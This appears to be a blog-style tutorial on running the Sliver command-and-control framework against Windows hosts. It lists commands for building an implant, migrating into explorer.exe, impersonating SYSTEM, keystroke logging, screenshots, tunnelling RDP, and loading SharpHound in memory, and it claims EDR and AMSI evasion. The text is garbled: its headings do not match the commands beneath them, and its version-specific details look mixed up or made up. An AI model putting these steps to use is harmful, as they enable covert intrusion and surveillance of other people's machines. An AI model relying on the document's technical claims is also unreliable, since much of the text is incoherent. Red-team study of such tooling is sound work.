Introduction

In the ever-evolving landscape of cybersecurity, offensive security tools are constantly adapting to bypass modern endpoint detection and response (EDR) systems. Among the most powerful frameworks to emerge in recent years is Sliver, an open-source cross-platform command and control (C2) framework developed by BishopFox. Designed as a superior alternative to tools like Cobalt Strike and Metasploit's meterpreter, Sliver has become a staple for red team operations.

.\sliver-server_windows.exe daemon

Once the server is running, generate your Windows implant. The core of your operation is the sliver client (implant). For v4.2.2 on Windows, use the generate command with Windows-specific flags.

Basic Windows Executable

generate --os windows --arch amd64 --format exe --save /tmp/

Advanced Evasion: Staging Payloads

To avoid static signatures, use the new staging mechanism:

ps # List all Windows processes
migrate -p 884 # Migrate into explorer.exe (PID 884)

Elevate to SYSTEM without spawning a new process:

getsystem -name "NT AUTHORITY\SYSTEM"
Current token: DESKTOP-ABC123\User -> Impersonating: NT AUTHORITY\SYSTEM

The Windows agent captures interaction:

screenshot # Saves to /tmp/screenshot.png
keystroke -m # Start real-time keystroke logging

Sliver v4.2.2 offers multiple persistence mechanisms:

portfwd add --remote 127.0.0.1:3389 --bind 0.0.0.0:33890 # RDP tunnel

Import .NET tools directly into memory:

execute-assembly -p SharpHound.exe -c All

AMSI Bypass

Sliver v4.2.2 includes a built-in AMSI patching module:

sliver v4.2.2 windows

generate --os windows --static --ldflags "-s -w"

Sliver v4.2.2 represents a significant leap forward for Windows-based C2 operations. Its refined process injection, EDR bypass techniques, native token manipulation, and stable beacon mode make it a formidable tool for legitimate red teaming and security research.

EDR bypass techniques